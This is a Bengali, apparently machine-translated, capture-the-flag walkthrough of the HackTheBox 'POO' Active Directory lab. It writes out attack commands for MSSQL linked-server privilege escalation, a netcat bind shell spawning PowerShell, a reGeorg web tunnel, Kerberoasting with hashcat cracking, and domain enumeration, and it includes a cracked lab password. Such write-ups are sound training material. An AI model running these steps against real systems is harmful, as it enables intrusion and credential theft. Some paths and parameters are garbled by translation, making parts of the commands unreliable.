HackTheBoxendgame. পরীক্ষাগার পেশাগত আক্রমণাত্মক অপারেশন উত্তরণ. Pentest সক্রিয় ডিরেক্টরি

এই নিবন্ধে, আমরা কেবল একটি মেশিন নয়, সাইট থেকে একটি সম্পূর্ণ মিনি-ল্যাবরেটরির উত্তরণ বিশ্লেষণ করব। HackTheBox.

বর্ণনায় বলা হয়েছে, POO একটি ছোট অ্যাক্টিভ ডিরেক্টরি পরিবেশে আক্রমণের সমস্ত পর্যায়ে দক্ষতা পরীক্ষা করার জন্য ডিজাইন করা হয়েছে। লক্ষ্য হল একটি উপলব্ধ হোস্টের সাথে আপস করা, বিশেষাধিকার বৃদ্ধি করা এবং শেষ পর্যন্ত প্রক্রিয়ায় 5টি পতাকা সংগ্রহ করে পুরো ডোমেনের সাথে আপস করা।

পরীক্ষাগারের সাথে সংযোগ VPN এর মাধ্যমে। আপনার জন্য গুরুত্বপূর্ণ ডেটা আছে এমন একটি কর্মক্ষম কম্পিউটার বা হোস্ট থেকে সংযোগ না করার পরামর্শ দেওয়া হয়, কারণ আপনি এমন ব্যক্তিদের সাথে একটি ব্যক্তিগত নেটওয়ার্কে যান যারা তথ্য সুরক্ষা সম্পর্কে কিছু জানেন 🙂

সাংগঠনিক তথ্য
যাতে আপনি নতুন নিবন্ধ, সফ্টওয়্যার এবং অন্যান্য তথ্য সম্পর্কে জানতে পারেন, আমি তৈরি করেছি টেলিগ্রাম চ্যানেল и যে কোন বিষয়ে আলোচনা করার জন্য গ্রুপ আইআইকেবি এলাকায়। এছাড়াও আপনার ব্যক্তিগত অনুরোধ, প্রশ্ন, পরামর্শ এবং সুপারিশ আমি একবার দেখে নিয়ে সবাইকে উত্তর দেব।.

সমস্ত তথ্য শুধুমাত্র শিক্ষাগত উদ্দেশ্যে প্রদান করা হয়. এই নথির লেখক এই নথির অধ্যয়নের ফলে প্রাপ্ত জ্ঞান এবং পদ্ধতিগুলি ব্যবহার করার ফলে কারও ক্ষতির জন্য কোনও দায়বদ্ধতা গ্রহণ করেন না।

ইন্ট্রো

এই শেষ গেমটিতে দুটি মেশিন রয়েছে এবং এতে 5টি পতাকা রয়েছে।

উপলব্ধ হোস্টের বিবরণ এবং ঠিকানাও দেওয়া আছে।

শুরু করা যাক!

রিকন পতাকা

এই মেশিনের একটি IP ঠিকানা আছে 10.13.38.11 যা আমি /etc/hosts এ যোগ করি।
10.13.38.11 poo.htb

প্রথম ধাপ হল খোলা পোর্ট স্ক্যান করা। যেহেতু nmap দিয়ে সব পোর্ট স্ক্যান করতে অনেক সময় লাগে তাই আমি প্রথমে masscan দিয়ে করব। আমরা 0pps এ tun500 ইন্টারফেস থেকে সমস্ত TCP এবং UDP পোর্ট স্ক্যান করি।

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

এখন, পোর্টগুলিতে চালানো পরিষেবাগুলি সম্পর্কে আরও বিশদ তথ্য পেতে, আসুন -A বিকল্পটি দিয়ে একটি স্ক্যান করি৷

nmap -A poo.htb -p80,1433

এইভাবে, আমাদের কাছে IIS এবং MSSQL পরিষেবা রয়েছে। এই ক্ষেত্রে, আমরা ডোমেইন এবং কম্পিউটারের আসল DNS নামটি খুঁজে বের করব। ওয়েব সার্ভারে, আমরা IIS হোম পেজ দ্বারা স্বাগত জানাই।

এর ডিরেক্টরি উপর পুনরাবৃত্তি করা যাক. আমি এর জন্য গবাস্টার ব্যবহার করি। প্যারামিটারে আমরা স্ট্রীমের সংখ্যা নির্দিষ্ট করি 128 (-t), URL (-u), অভিধান (-w) এবং এক্সটেনশনগুলি যা আমাদের আগ্রহের (-x)।

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

এইভাবে, আমাদের কাছে /admin ডিরেক্টরির জন্য HTTP প্রমাণীকরণ রয়েছে, সেইসাথে .DS_Store ডেস্কটপ পরিষেবা স্টোরেজ ফাইল উপলব্ধ। .DS_Store হল এমন ফাইল যা একটি ফোল্ডারের জন্য ব্যবহারকারীর সেটিংস সংরক্ষণ করে, যেমন ফাইলের তালিকা, আইকন অবস্থান, নির্বাচিত ব্যাকগ্রাউন্ড ইমেজ। এই ধরনের একটি ফাইল ওয়েব ডেভেলপারদের ওয়েব সার্ভার ডিরেক্টরিতে শেষ হতে পারে। এইভাবে, আমরা ডিরেক্টরির বিষয়বস্তু সম্পর্কে তথ্য পেতে পারি। এই জন্য আপনি ব্যবহার করতে পারেন DS_Store ক্রলার.

python3 dsstore_crawler.py -i http://poo.htb/

আমরা ডিরেক্টরির বিষয়বস্তু পাই। এখানে সবচেয়ে আকর্ষণীয় বিষয় হল /dev ডিরেক্টরি, যেখান থেকে আমরা দুটি শাখায় সোর্স এবং db ফাইল দেখতে পারি। কিন্তু আমরা ফাইল এবং ডিরেক্টরির নামের প্রথম 6টি অক্ষর ব্যবহার করতে পারি যদি পরিষেবাটি IIS ShortName-এর জন্য ঝুঁকিপূর্ণ হয়। আপনি ব্যবহার করে এই দুর্বলতা পরীক্ষা করতে পারেন IIS সংক্ষিপ্ত নাম স্ক্যানার.

এবং আমরা একটি পাঠ্য ফাইল খুঁজে পাই যা "poo_co" দিয়ে শুরু হয়। এরপরে কী করতে হবে তা না জেনে, আমি কেবলমাত্র "co" দিয়ে শুরু হওয়া সমস্ত শব্দ ডিরেক্টরির অভিধান থেকে নির্বাচন করেছি।

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

এবং wfuzz সঙ্গে পুনরাবৃত্তি.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

এবং সঠিক শব্দ খুঁজে! আমরা এই ফাইলটি দেখি, শংসাপত্রগুলি সংরক্ষণ করি (DBNAME প্যারামিটার দ্বারা বিচার করে, সেগুলি MSSQL থেকে)।

আমরা পতাকা হস্তান্তর করি, এবং আমরা 20% অগ্রসর হই।

হুহ পতাকা

আমরা MSSQL এর সাথে সংযোগ করি, আমি DBeaver ব্যবহার করি।

আমরা এই ডাটাবেসে আকর্ষণীয় কিছু খুঁজে পাই না, আসুন একটি এসকিউএল এডিটর তৈরি করি এবং ব্যবহারকারীরা কী তা পরীক্ষা করি।

SELECT name FROM master..syslogins;

আমরা দুই ব্যবহারকারী আছে. আমাদের বিশেষাধিকার চেক করা যাক.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

সুতরাং, কোন বিশেষাধিকার আছে. চলুন লিঙ্ক সার্ভার দেখুন, আমি বিস্তারিত এই কৌশল সম্পর্কে লিখেছি এখানে.

SELECT * FROM master..sysservers;

তাই আমরা অন্য SQL সার্ভার খুঁজে. Openquery() ব্যবহার করে এই সার্ভারে কমান্ডের এক্সিকিউশন পরীক্ষা করা যাক।

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

এবং আমরা এমনকি একটি ক্যোয়ারী গাছ নির্মাণ করতে পারেন.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

আসল বিষয়টি হল যে আমরা যখন একটি লিঙ্ক সার্ভারে একটি অনুরোধ করি, তখন অনুরোধটি অন্য ব্যবহারকারীর প্রেক্ষাপটে কার্যকর করা হয়! আসুন আমরা লিঙ্ক করা সার্ভারে কোন ব্যবহারকারীর প্রসঙ্গ চালাচ্ছি তা দেখি।

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

এবং এখন দেখা যাক আমাদের লিঙ্ক করা সার্ভার থেকে অনুরোধটি কী প্রেক্ষাপটে কার্যকর হয়!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

সুতরাং, এটি একটি ডিবিও প্রসঙ্গ যাতে সমস্ত বিশেষাধিকার থাকতে হবে। একটি লিঙ্ক সার্ভার থেকে একটি অনুরোধের ক্ষেত্রে বিশেষাধিকার পরীক্ষা করা যাক.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

আপনি দেখতে পারেন, আমরা সব বিশেষাধিকার আছে! আসুন আমাদের এডমিন তৈরি করি এভাবে। কিন্তু তারা ওপেনকোয়েরির মাধ্যমে তাদের অনুমতি দেয় না, এর মাধ্যমে এটি কার্যকর করা যাক।

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

এবং এখন আমরা নতুন ব্যবহারকারীর শংসাপত্রের সাথে সংযোগ করি, নতুন পতাকা ডাটাবেস পর্যবেক্ষণ করি।

আমরা এই পতাকা হস্তান্তর করি এবং আরও এগিয়ে যাই।

ব্যাকট্র্যাক পতাকা

আসুন MSSQL ব্যবহার করে শেলটি পান, আমি ইমপ্যাকেট প্যাকেজ থেকে mssqlclient ব্যবহার করছি।

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

আমাদের পাসওয়ার্ড পেতে হবে, এবং প্রথম জিনিস যা আমরা ইতিমধ্যে পূরণ করেছি তা হল সাইট। সুতরাং, আমাদের একটি ওয়েব সার্ভার কনফিগার প্রয়োজন (একটি সুবিধাজনক শেল নিক্ষেপ করা অসম্ভব, দৃশ্যত ফায়ারওয়াল কাজ করছে)।

কিন্তু প্রবেশাধিকার অস্বীকার করা হয়। যদিও আমরা MSSQL থেকে ফাইলটি পড়তে পারি, তবে আমাদের শুধু জানতে হবে কোন প্রোগ্রামিং ল্যাঙ্গুয়েজগুলো কনফিগার করা আছে। এবং MSSQL ডিরেক্টরিতে আমরা খুঁজে পাই যে পাইথন আছে।

তাহলে web.config ফাইলটি পড়তে কোন সমস্যা নেই।

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

শংসাপত্র পাওয়া গেলে, /admin-এ যান এবং পতাকাটি তুলে নিন।

পাদদেশ পতাকা

আসলে, ফায়ারওয়াল ব্যবহার করার কিছু অসুবিধা আছে, কিন্তু নেটওয়ার্ক সেটিংস দেখে আমরা লক্ষ্য করি যে IPv6 প্রোটোকলও ব্যবহার করা হয়েছে!

এই ঠিকানাটি /etc/hosts এ যোগ করুন।
dead:babe::1001 poo6.htb
আবার হোস্ট স্ক্যান করা যাক, কিন্তু এবার IPv6 এর উপরে।

এবং WinRM পরিষেবা IPv6 তে উপলব্ধ। এর পাওয়া শংসাপত্রের সাথে সংযোগ করা যাক.

ডেস্কটপে একটা পতাকা আছে, হাতে দাও।

P00ned পতাকা

সঙ্গে হোস্ট উপর reconnaissance পরে winpeas আমরা বিশেষ কিছু খুঁজে পাই না। তারপরে আবার শংসাপত্রগুলি সন্ধান করার সিদ্ধান্ত নেওয়া হয়েছিল (আমি এই বিষয়েও লিখেছিলাম প্রবন্ধ) কিন্তু আমি WinRM এর মাধ্যমে সিস্টেম থেকে সমস্ত SPN পেতে পারিনি।

setspn.exe -T intranet.poo -Q */*

আসুন MSSQL এর মাধ্যমে কমান্ডটি কার্যকর করি।

এইভাবে, আমরা p00_hr এবং p00_adm ব্যবহারকারীদের SPN পাই, যার মানে হল তারা Kerberoasting-এর মতো আক্রমণের জন্য ঝুঁকিপূর্ণ। সংক্ষেপে, আমরা তাদের পাসওয়ার্ডের হ্যাশ পেতে পারি।

প্রথমে আপনাকে MSSQL ব্যবহারকারীর পক্ষে একটি স্থিতিশীল শেল পেতে হবে। কিন্তু যেহেতু আমরা অ্যাক্সেসে সীমিত, তাই পোর্ট 80 এবং 1433 এর মাধ্যমে হোস্টের সাথে আমাদের সংযোগ রয়েছে। কিন্তু 80 বন্দর দিয়ে ট্রাফিক টানেল করা সম্ভব! এর জন্য আমরা ব্যবহার করি পরবর্তী আবেদন. tunnel.aspx ফাইলটি ওয়েব সার্ভারের হোম ডিরেক্টরিতে আপলোড করা যাক - C: inetpubwwwroot।

কিন্তু যখন আমরা এটি অ্যাক্সেস করার চেষ্টা করি, আমরা একটি 404 ত্রুটি পাই।এর মানে হল যে *.aspx ফাইলগুলি কার্যকর হয় না। এই এক্সটেনশনগুলির সাথে ফাইলগুলি চালানোর জন্য, নিম্নরূপ ASP.NET 4.5 ইনস্টল করুন।

dism /online /enable-feature /all /featurename:IIS-ASPNET45

এবং এখন, tunnel.aspx অ্যাক্সেস করার সময়, আমরা উত্তর পাই যে সবকিছু যেতে প্রস্তুত।

আসুন অ্যাপ্লিকেশনটির ক্লায়েন্ট অংশটি শুরু করি, যা ট্র্যাফিক রিলে করবে। আমরা পোর্ট 5432 থেকে সার্ভারে সমস্ত ট্র্যাফিক ফরোয়ার্ড করব।

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

এবং আমরা আমাদের প্রক্সির মাধ্যমে যেকোনো অ্যাপ্লিকেশনের ট্রাফিক পাঠাতে প্রক্সিচেইন ব্যবহার করি। আসুন এই প্রক্সিটিকে /etc/proxychains.conf কনফিগারেশন ফাইলে যোগ করি।

এখন সার্ভারে প্রোগ্রাম আপলোড করা যাক netcat, যা দিয়ে আমরা একটি স্থিতিশীল বাঁধাই শেল এবং স্ক্রিপ্ট তৈরি করব Kerberoast আহ্বান করুন, যা দিয়ে আমরা কারবারোস্টিং আক্রমণ করব।

এখন, MSSQL এর মাধ্যমে, আমরা লিসেনার চালু করি।

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

এবং আমরা আমাদের প্রক্সির মাধ্যমে সংযোগ করি।

proxychains rlwrap nc poo.htb 4321

এবং এর হ্যাশ পেতে.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

এর পরে, আপনাকে এই হ্যাশগুলির উপর পুনরাবৃত্তি করতে হবে। যেহেতু rockyou এর পাসওয়ার্ড ডেটা অভিধান নেই, তাই আমি Seclists-এ দেওয়া সমস্ত পাসওয়ার্ড অভিধান ব্যবহার করেছি। গণনার জন্য আমরা হ্যাশক্যাট ব্যবহার করি।

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

এবং আমরা উভয় পাসওয়ার্ডই পাই, প্রথমটি dutch_passwordlist.txt অভিধানে এবং দ্বিতীয়টি Keyboard-Combinations.txt-এ।

এবং তাই আমাদের তিনজন ব্যবহারকারী আছে, আমরা ডোমেইন কন্ট্রোলারে যাই। আগে তার ঠিকানা জেনে নেওয়া যাক।

দারুণ, আমরা ডোমেইন কন্ট্রোলারের আইপি ঠিকানা শিখেছি। আসুন ডোমেনের সমস্ত ব্যবহারকারী খুঁজে বের করি, সেইসাথে তাদের মধ্যে কে একজন প্রশাসক। তথ্য পাওয়ার জন্য স্ক্রিপ্ট ডাউনলোড করতে PowerView.ps1. তারপরে আমরা -s প্যারামিটারে স্ক্রিপ্ট সহ ডিরেক্টরি নির্দিষ্ট করে, evil-winrm ব্যবহার করে সংযোগ করব। এবং তারপর শুধু পাওয়ারভিউ স্ক্রিপ্ট লোড করুন।

এখন আমরা এর সমস্ত ফাংশন অ্যাক্সেস করতে পেরেছি। p00_adm ব্যবহারকারী দেখতে একটি বিশেষ সুবিধাপ্রাপ্ত ব্যবহারকারীর মতো, তাই আমরা এর প্রসঙ্গে কাজ করব। আসুন এই ব্যবহারকারীর জন্য একটি PSC Credential অবজেক্ট তৈরি করি।

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

এখন সমস্ত পাওয়ারশেল কমান্ড যেখানে আমরা ক্রেডস নির্দিষ্ট করি সেগুলি p00_adm-এর পক্ষ থেকে কার্যকর করা হবে। ব্যবহারকারীদের একটি তালিকা এবং AdminCount বৈশিষ্ট্য প্রদর্শন করা যাক।

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

এবং তাই, আমাদের ব্যবহারকারী সত্যিই বিশেষাধিকারপ্রাপ্ত. দেখা যাক সে কোন দলের সদস্য।

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

আমরা অবশেষে নিশ্চিত করি যে ব্যবহারকারী একজন ডোমেন প্রশাসক। এটি এটিকে ডোমেন কন্ট্রোলারে দূরবর্তীভাবে লগ ইন করার অধিকার দেয়৷ আসুন আমাদের টানেল ব্যবহার করে WinRM দিয়ে লগইন করার চেষ্টা করি। আমি খারাপ-উইনআরম ব্যবহার করার সময় reGeorg দ্বারা জারি করা ত্রুটিগুলি দ্বারা বিভ্রান্ত হয়ে পড়েছিলাম৷

তারপরে আমরা আরেকটি ব্যবহার করি, সহজ, লিপি WinRM এর সাথে সংযোগ করতে। সংযোগ পরামিতি খুলুন এবং পরিবর্তন করুন।

আমরা সংযোগ করার চেষ্টা করি, এবং আমরা সিস্টেমে আছি।

কিন্তু পতাকা নেই। তারপর ব্যবহারকারীর দিকে তাকান এবং ডেস্কটপগুলি পরীক্ষা করুন।

mr3ks এ আমরা পতাকা খুঁজে পাই এবং পরীক্ষাগারটি 100% সম্পন্ন হয়েছে।

এখানেই শেষ. প্রতিক্রিয়া হিসাবে, আপনি এই নিবন্ধটি থেকে নতুন কিছু শিখেছেন কিনা এবং এটি আপনার জন্য দরকারী কিনা তা মন্তব্য করুন।

আপনি আমাদের সাথে যোগ দিতে পারেন Telegram. সেখানে আপনি আকর্ষণীয় উপকরণ, মার্জড কোর্স, সেইসাথে সফ্টওয়্যার খুঁজে পেতে পারেন। আসুন এমন একটি সম্প্রদায়কে একত্রিত করি যেখানে এমন লোকেরা থাকবে যারা আইটি-এর অনেকগুলি ক্ষেত্র বোঝে, তারপর আমরা যে কোনও আইটি এবং তথ্য সুরক্ষা সংক্রান্ত বিষয়ে একে অপরকে সর্বদা সাহায্য করতে পারি।

উত্স: www.habr.com